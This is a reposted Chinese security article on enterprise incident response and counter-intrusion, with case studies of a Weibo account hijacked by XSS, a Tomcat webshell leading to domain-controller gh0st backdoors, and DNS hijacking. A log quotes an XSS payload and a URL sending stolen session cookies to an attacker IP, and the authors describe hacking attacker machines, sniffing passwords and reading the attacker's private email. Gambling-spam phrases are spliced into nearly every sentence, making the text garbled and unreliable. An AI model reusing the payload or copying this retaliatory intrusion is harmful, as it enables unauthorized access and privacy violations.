IT技術互動交流平台

“企業應急響應和反滲透”之真實案例分析

作者_花色处女地:Painting  發布日期-注册送39元彩金的彩票:2015-08-22 22:28:28

峰會上講過的議題-__铁拳毒药,整理成文章---助赢计划app,以供大家批評指正||-上海学分银行。

對於企業應急響應_父亲的盾牌,我想隻要從事安全工作的同學都有接觸-_易中彩票代玩账号兼职,我也一樣-__105彩票官网,在甲方乙方工作的這幾年|ovi套件,處理過不少應急響應的事件-海门中学,但是每個人都會有自己做事的方法-盈彩网,在這裏我主要分享一下我對應急響應的理解以及對碰到的一些案例_--偷天奇谋。

0x00 什麼時候做應急響應-_106官网彩票计划?


應急響應--索爱595,估計最近幾年聽到這個詞更多是因為各大甲方公司開始建設和運營自己的應急響應平台_取名网鸿运测名,也就是 xSRC--芭蕾雨 悦都。看起來對報告到這些地方的漏洞進行處理就已經成為企業應急響應的主要工作-__仲博彩票平台靠谱吗,但是以我之前在甲方親自參與建設應急響應平台和去其他企業應急響應平台提交漏洞的經驗來看--肖志恒简历,能真正把平台上的漏洞當時應急響應事件去處理的寥寥無幾|-黄河电视台节目表,更多的隻是|-2011手机qq:接收->處理這種簡單重複的流水線工作_-_10选5彩票骗局。因為他們會覺得報告到這些地方的漏洞它的風險是可控的-|好听的彩铃。

我理解的應急響應是對突發的未知的安全事件進行應急響應處理|-易购彩票。這種情況一般都是“被黑”了|-暗夜玫瑰sp。“被黑”包括很多種--|节日提醒:服務器被入侵||雅妮轩,業務出現蠕蟲事件-_|众发娱乐安卓,用戶以及公司員工被釣魚攻擊||168彩票中奖能兑现吗,業務被 DDoS 攻擊|--平山腾龙山,核心業務出現DNS|-35彩票网站是正规的吗、鏈路劫持攻擊等等等等|-|毒黄瓜事件。

0x01 為什麼做應急響應-||石钟乳?


我在峰會上說是**的||腾讯客服网站,雖然隻是開個玩笑--上海一号店客服电话,但是也能夠反映出做應急響應是一件苦差事|__邮政上班时间,有的時候要做到 7*24 小時響應-|_世界杯草坪多少钱,我覺得是沒人喜歡這麼一件苦差事的_-_北华信集团,但是作為安全人員這是我們的職責|-丁丁网 南京。

那說到底我們為什麼做應急響應呢--|锥子脸蒂娜,我覺得有以下幾個因素--|盈彩网怎么不能更新:

  1. 保障業務
  2. 還原攻擊
  3. 明確意圖
  4. 解決方案
  5. 查漏補缺
  6. 司法途徑

    對於甲方的企業來說業務永遠是第一位的|||农行黄金价格,沒有業務何談安全||剑气侠虹,那麼我們做應急響應首先就是要保障業務能夠正常運行|-_中兴彩票,其次是還原攻擊場景|乐妇源养阴宝,攻擊者是通過什麼途徑進行的攻擊-|山寨机游戏下载,業務中存在什麼樣的漏洞_-_至尊app官方下载,他的意圖是什麼__|南昌3套政法频道?竊取數據__亿彩时时彩人工计划?炫耀技術_qq水浒媚李立?當我們了解到前麵的之後就需要提出解決方案_-九伯网,修複漏洞-_1号娱乐app网址?還是加強訪問控製_-幼儿教师工作总结?增添監控手段||-中央政治局常委人数?等等|集成功放,我們把當前的問題解決掉之後__河南m值兑换,我們還需要查漏補缺-360彩票网客户端,來解決業務中同樣的漏洞_大丰长途汽车站?最後就是需不需要司法的介入-|106彩票注册。

    0x02 怎麼做應急響應--永盛彩票官网和亚泰坊?


    具體怎麼做應急響應|-开个植物店,我之前根據自己做應急響應的經驗總結幾點-_广东特产:

    1. 確定攻擊時間
    2. 查找攻擊線索
    3. 梳理攻擊流程
    4. 實施解決方案
    5. 定位攻擊者

      確定攻擊時間能夠幫助我們縮小應急響應的範圍|_付静微博,有助於我們提高效率--找个身份证,查找攻擊線索|-酒嘉视窗,能夠讓我們知道攻擊者都做了什麼事情||兰州商学院教务管理系统,梳理攻擊流程則是還原整個攻擊場景--飞慧奶粉,實施解決方案就是修複安全漏洞|-张琳芃任国足队长,切斷攻擊途徑__-世纪星影院,最後就是定位攻擊人||-陕西省公务员局网,則是取證|-26岁毒贩获死刑。

      ps_|-钱多多手机铃声:定位攻擊者|-socolo草本漱口水,我覺得羅卡定律說的挺好的||相容以莫:凡有接觸-_-深圳东门步行街攻略,必留痕跡-_河南省实验中学。

      0x03 為什麼做反滲透|__1950彩票?


      一方麵我們可以把被動的局麵轉變為主動的局麵-宜昌天问学校,在這種主動的局麵下我們能夠了解到攻擊者都對我們做了什麼事情-_苏州消防网,做到什麼程度||-亿客隆彩票注册,他下一步的目標會是什麼_--青年工社?最關鍵的我們能夠知道攻擊者是誰_-掌上娱乐时时彩正规吗?。

      那麼具體怎麼做呢--永胜国际app可靠吗?就要用攻擊者的方法反擊攻擊者-优彩师真的假的。說起來簡單__娱乐天地可以充钱吗,做起來可能就會發現很難-|广州市花都区教育局,但是我們可以借助我們自身的優勢|_-神州行大众卡,通過業務數據交叉對比來對攻擊者了解更多_-|随心聊,甚至可以在攻擊者的後門裏麵加上攻擊代碼等_-青青岛社区胶南论坛。

      0x04 案例之官微帳號被盜


      這是第一個案例_--运盛彩票,是官方微博帳號被盜的案例||西安都市快报直播。首先看下麵兩張圖片__|干旱新闻:

      enter image description here

      enter image description here

      某天我們的一個官方帳號突發連續發兩條不正常的微博內容__众赢国际是合法的吗,看到第一條的時候還以為是工作人員小手一抖-|-101号宠物恋人2,test 到手|_青岛教育人事网,以為是工作人員的誤操作_--野兽与乡巴佬下载,但是看到第二條微博的時候就已經能夠判斷帳號出了問題_-广州缓交女,具體是什麼問題隻能通過後麵的分析才知道---306官方彩票靠谱吗?。

      但是肯定的是這不是工作人員進行的操作||小学语文教学叙事,一方麵在這種重要帳號的操作上有一些製度_-苏拿,其次是發布的內容也比較明顯|-中国乐队名字,根據發布的時間通過後台係統分析-_防空兵指挥学院,該帳號有通過 cookie 在非公司 IP 進行過登錄|石天照片,但是我們的 cookie 是通過 httponly 進行保護的_|-亿博彩票安全吗,how-青木关二手房出售?

      接下來鎖定那個時間段操作過官方微博帳號同事的工作電腦__雯雅婷漫画全集图片,在其使用的火狐瀏覽器中發現有下麵連續的幾條訪問記錄-_|李玉刚星光大道月赛:

      ==================================================
      URL               : http://t.cn/zW*bUQ
      Last Visit Date   : 2012-7-16 19:22:27
      ==================================================
      
      ==================================================
      URL               : http://50.116.13.242/index.php
      Last Visit Date   : 2012-7-16 19:22:28
      Referrer          : http://t.cn/zW*bUQ
      ==================================================
      
      ==================================================
      URL               : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript__|038彩票注册:%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})
      Last Visit Date   : 2012-7-16 19:22:28
      Referrer          : http://50.116.13.242/index.php
      Title             : player.swf (application/x-shockwave-flash 對象)
      ==================================================
      
      ==================================================
      URL               : http://50.116.13.242/e.php?opener=0&cookie=ULV%3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma%3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B%20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3D*@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry%3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B%20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des%253D5937b4f4509871fc45195767ea7abe37%2526ev%253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c%25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V%25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2
      Last Visit Date   : 2012-7-16 19:22:31
      Referrer          : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript|_妖精的尾巴421:%22%3Cscript/src=http://50.*.*.242/e.js%3E%3C/script%3E%22%27})
      ==================================================
      

      對上麵的訪問記錄我想我不需要做太多的解釋|-铲形币是哪个国家的。在官方微博帳號的私信裏麵有 http://t.cn/zW*bUQ 的私信記錄-_168彩票网站是真的吗。

      到這裏就已經能夠還原整個攻擊場景了

      1. 工作人員收到一條私信-_|阿诗郎,並且打開了
      2. 私信鏈接是一個 xss 漏洞的鏈接
      3. 攻擊代碼利用另外一個業務的 apache httponly cookie 泄露漏洞竊取到 cookie

        事後我們修複了這次攻擊中的漏洞__-如何办理皈依证,同時修複了業務中同類的安全漏洞-_-易旺彩票app,同時加強了員工安全意識-|2011qq免费下载,並且增加了相應的帳號安全策略-_|九死一生是什么生肖。

        最後我們通過後台的 IP 和郵箱等數據定位到了攻擊者掌上福利彩,在整個攻擊中也並沒有惡意-_金色池塘自助餐,他也把相關的漏洞和攻擊過程提交到烏雲漏洞報告平台_-_芭耐得,大家可以去主站找找這個漏洞|||平码四中四,我這裏就不貼相關鏈接了_|御龙在天野蘑菇。

        0x05 案例之 500 錯誤日誌引發的血案


        首先看下圖

        enter image description here

        一天 QA 發來郵件詢問一個比較異常的事情|_雅迪燃油助力车价格,某測試業務出現多條狀態碼為 500 的日誌_-天天向上20100205,QA 懷疑是有黑客攻擊|-赢彩彩票怎么提现,我們開始介入進行分析-|106官网彩票手机版。

        500 錯誤代表文件真實存在過並且被人訪問執行過|-长沙限行,但是現在文件已經被刪除了_|苏州大润发官方网站,通過文件名可以判斷並非是業務需要的文件_e乐姿,被黑的可能性比較大||云购彩票是什么,然後找來 TOMCAT 和前端 Nginx 日誌查看的確被上傳了 webshell|-_优乐彩彩票。

        enter image description here

        根據攻擊者 IP 和時間等線索通過分析 nginx 和 tomcat 的日誌可以確定攻擊者是通過 tomcat 的管理後台上傳的 webshell-|光明牛奶网上订购,並且通過 webshell 做了許多操作

        enter image description here

        但是tomcat 帳號密碼並非弱密碼___2019年天下彩开奖结果,how-||易彩集团app?我們接下來對全網的 tomcat 進行了排查-_|适宝康奶瓶,發現在其中一台內網服務器存在 tomcat 弱口令|||刷qb软件,並且帳號配置文件中含有攻擊者使用的帳號和密碼___132彩票手机版最新苹果,隻是這台服務器較早之前下線了公網 IP-_-联众好友在线下载,隻保留內網 IP_-|虞城教育网,並且通過分析這台服務器的日誌__点亮qq自由幻想图标,能夠判斷攻擊者之前就已經通過弱口令拿到了服務器權限西安舞厅,並且收集了服務器上的用戶名和密碼等信息__108官网彩票。

        我們想看看攻擊者到底想幹什麼--舅舅和外甥的关系,對之前收集的攻擊者 IP 進行反滲透-_|经典电影排行榜前十名,用“黑客”的方法拿到香港-|零客户机,廊坊多台攻擊者肉雞權限_马三家子,肉雞上發現了大量黑客工具和掃描日誌||-众赢彩票投注,在其中一台肉雞上發現我們內網仍有服務器被控製__华嘉元。

        下麵兩張圖片可以看到攻擊者通過 lcx 中轉了內網的反彈 shell

        enter image description here

        enter image description here

        那麼到目前為止我們做了哪些事情呢_-沈阳网通宽带测速?

        1. 清理後門
        2. 清理全網 tomcat
        3. 梳理全網 web 目錄文件
        4. 修改業務相關帳號密碼
        5. 修改業務關鍵代碼
        6. 加強 IDC 出口策略
        7. 部署 snort

          做了好多事情|-雨露培训?可是事實上呢|_234彩票靠资源?事情並沒有我們想的那麼簡單|-|喜得益。

          之前的安全事件剛過不久||徐茂根,IT 人員反饋域控服務器異常_-1999年彩票中奖号码,自動重啟-致富彩票网址,非常異常--_康姆昂北鼻够。登錄域控進行排查原因_--038彩票下载网站,發現域控被植入了 gh0st 後門-_-瓯江影城。

          enter image description here

          域控被控製_-_腾讯客服网站,那域控下麵的服務器的安全性就毫無保障|-_陈进平,繼續對辦公網所有的 windows 服務器排查_|_进口货物报关单样本,發現多台 Windows 服務器被植入後門|台湾桔熊,攻擊的方法是通過域控管理員帳號密碼利用 at 方式添加計劃任務|-|瑞柏儿。

          能夠知道攻擊者是如何入侵的域控服務器比較關鍵_--金坛阳光旅行社,對域控服務器的日誌進行分析發現下麵可疑的日誌_|2628彩票登录网站:

          2011-11-10,14:03:47,Security,審核成功,登錄/注銷 ,540,**,PDC,”成功的網絡登錄:
          用戶名:    *.ad
          域:      *
          登錄 ID:      (0x0,0x1114E11)
          登錄類型:   3
          登錄過程:   NtLmSsp 
          身份驗證數據包:    NTLM
          工作站名:   CC-TEST-V2
          登錄 GUID:    -
          調用方用戶名: -
          調用方域:   -
          調用方登錄 ID:   -
          調用方進程 ID: -
          傳遞服務: -
          源網絡地址:  192.168.100.81
          源端口:    0
          
          2011-11-10,3:13:38,Security,審核失敗,帳戶登錄 ,680,NT AUTHORITYSYSTEM,PDC,'嚐試  登錄的用戶:  MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
          登錄帳戶:   QM-*$
          源工作站:   CC-TEST-V2
          錯誤代碼:   0xC000006A
          '
          2011-11-10,3:13:38,Security,審核失敗,帳戶登錄 ,680,NT AUTHORITYSYSTEM,PDC,'嚐試  登錄的用戶:  MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
          登錄帳戶:   QM-*$
          源工作站:   CC-TEST-V2
          錯誤代碼:   0xC000006A
          

          結合之前的信息能夠鎖定 192.168.100.81 是攻擊源||注册送28的彩票app,遂對這台服務器進行確認|名书,結果有點令人吃驚-_抗战奇侠2:

          這是一台虛擬機-_众发彩票,運行在一台普通的 PC 機上-|_2019还能买足彩的app,這台 PC 機就放在業務部門同事的腳底下-网络红人莫小晓,這台虛擬機本身啟用了 3389|--笑刑大唐txt下载,存在弱口令|108娱乐骗局带的人,我們之前在對內網安全檢查時铁路公安改革,這台虛擬機處於關機狀態||_内地av。由於這台虛擬機上麵跑的有測試業務|-亿彩彩票有官网吗,域控管理員曾經登錄過|脉搏士。

          綜合我們之前得到的信息可以確定這台虛擬機是攻擊者入侵我們辦公網的第一台服務器|||仙楚2txt下载,通過把這個虛擬機作為跳板攻擊辦公網其他服務器-_-永盛彩票导航,至於這台虛擬機是如何被入侵的-__123彩票手机版APP,我們後麵也確定是因為上次的攻擊事件-_-智彩电子走势图免费版,攻擊者通過 IDC 進入到的辦公網___2628彩票天天签到。

          我們又做了什麼-_|苦雨孤灯?

          1. 排查所有 windows 服務器
          2. 對之前確定被入侵的服務器重裝_|2014三中全会,包括域控
          3. snort 上加了 gh0st 的特征

            snort 加上 gh0st 的特征後不久我們就發現我們辦公網還有服務器被控製

            enter image description here

            對這台服務器進行清理後-_-李晨nic新浪微博,我們仍然沒有放棄對攻擊者的反滲透_--娱乐天地怎么登录不起,這次我們發現攻擊者還有美國的 IP|_某糕点厂中秋节前要制作一批盒装月饼,對其滲透_-_英杰交流中心,最終通過 c 斷進行 cain 嗅探到 3389 的密碼||_永盛彩板。

            登錄到這台美國 IP 的服務器後|__腾翼c70何时上市,發現上麵運行著 gh0st 的控製端--致命交易市长放过我,我們內網仍然有一台服務器處於上線狀態_我要一个身份证号码。

            enter image description here

            其實到這裏這次事件就能告一段落了---优彩彩票是不是违法的,關於攻擊者我們在這台美國的服務器上發現了攻擊者的多個 QQ 和密碼_|-识字闪卡,登錄郵箱後找到了攻擊者的簡曆等私人信息|cf修复工具,還有就是我們之前也獲取到攻擊者在國內某安全論壇帳號||襄垣县贴吧。其實到這裏我們能夠確定攻擊者是誰了|-|沈阳热线宽带测速。

            enter image description here

            enter image description here

            0x06 案例之永無止境的劫持


            對於劫持我想大家都不陌生||盈彩网com,我們在生活中比較常見到的就是運營商在頁麵中插入廣告等代碼__腾讯老板和陈碧婷,這種就是一種劫持攻擊山东高考人数。

            回到案例本身|_色拉拉,我們的一個業務先後出現多次多種手段的劫持攻擊|-娱乐天地怎么找客服,一次是 dns 劫持||_腾讯a股大赛2013,把業務的域名劫持到 61.* 這個 ip 上_|-长安街英菲尼迪,另外一次是鏈路劫持--|滦南贴吧,替換服務器返回給用戶的 http 響應內容--|德州华翔驾校,這兩次的目的都一樣就是在登錄口添加 js 代碼_艾艾社区,用於竊取用戶的用戶名和明文密碼|-众益彩下载。我們另外一個業務也遭受鏈路劫持|||中国梦想秀圆梦专场,直接替換客戶投放的廣告代碼__106时时彩票,給業務造成很大的經濟損失||-村姑图片。

            下麵兩個圖是我們業務監控係統和基調的截圖-|长线驱动器,上麵的圖可以很明顯看到在 9:30 用戶登錄成功數明顯下降--长沙黄花机场到火车站,持續不到一個小時|--金螳螂 朱兴良,下圖是全國部分地區基調的數據-瑞丽裳电子杂志,可以看到域名被明顯劫持到 61 這個 ip-|-众彩彩票是骗局吗,這是一次典型的 DNS 攻擊||比亚斯。

            enter image description here

            enter image description here

            頁麵中被插入的攻擊核心代碼

            1234567891011121314151617181920212223

延伸閱讀_腹痛吧:

Tag標簽-_31选7走势图: 反滲透   案例分析   企業  
  • 專題推薦

  • Directx11 遊戲編程入門教程
  • 專題主要學習DirectX的初級編程入門學習--|亿人彩票平台可靠吗,對Directx11的入門及初學者有...... 詳細
  • Windows7係統入門 優化 技巧技術專題
  • Windows7係統專題 無論是升級操作係統___雅马哈r1报价、資料備份||宋慧乔谈结婚、加強資料的安全及管...... 詳細
About IT165 - 廣告服務 - 隱私聲明 - 版權申明 - 免責條款 - 網站地圖 - 網友投稿 - 聯係方式
本站內容來自於互聯網,僅供用於網絡技術學習,學習中請遵循相關法律法規
腾讯分分彩幸运蛋蛋幸运蛋蛋分分彩爱购彩票福德正神彩票

免责声明: 本站资料及图片来源互联网文章,本网不承担任何由内容信息所引起的争议和法律责任。所有作品版权归原创作者所有,与本站立场无关,如用户分享不慎侵犯了您的权益,请联系我们告知,我们将做删除处理!